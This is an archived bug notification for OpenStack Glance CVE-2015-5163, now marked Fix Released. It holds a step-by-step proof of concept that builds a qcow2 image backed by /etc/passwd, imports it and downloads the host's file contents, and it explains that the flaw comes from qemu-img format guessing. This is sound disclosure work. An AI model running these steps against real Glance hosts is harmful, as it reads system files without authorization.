yahoo-eng-team team mailing list archive
-
yahoo-eng-team team
-
Mailing list archive
-
Message #38122
[Bug 1471912] Re: [OSSA 2015-014] Format-guessing and file disclosure via image conversion (CVE-2015-5163)
** Changed in: glance
Status: Fix Committed => Fix Released
--
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to Glance.
https://bugs.launchpad.net/bugs/1471912
Title:
[OSSA 2015-014] Format-guessing and file disclosure via image
conversion (CVE-2015-5163)
Status in Glance:
Fix Released
Status in OpenStack Security Advisory:
Fix Released
Bug description:
This is a security flaw that allows files from the Glance host to be
obtained by a user.
I'm using the Glance file store and have set in /etc/glance/glance-api.conf:
[taskflow_executor]
engine_mode=serial # not sure if needed
conversion_format=raw
Make a malicious image available via HTTP.
$ sudo qemu-img create -f qcow2 /var/www/html/test_image 1M
$ sudo qemu-img rebase -u -b /etc/passwd /var/www/html/test_image
$ glance --os-image-api-version 2 task-create --type import --input '{"import_from_format": "qcow2", "import_from": "http://127.0.0.1/test_image", "image_properties": {"name": "my_image_test", "disk_format": "qcow2", "container_format": "bare"}}'
$ glance image-download my_image_test --file downloaded_image
$ head downloaded_image
<contents from /etc/passwd on the Glance host>
This happens because Glance runs this command which doesn't specify a format, and uses qemu-img's format auto-detection:
qemu-img convert -O raw file:///tmp/28e1f5e8-9f62-4c01-84be-9feae8852ea4 /tmp/28e1f5e8-9f62-4c01-84be-9feae8852ea4.converted
Similar to Cinder bug 1415087.
To manage notifications about this bug go to:
https://bugs.launchpad.net/glance/+bug/1471912/+subscriptions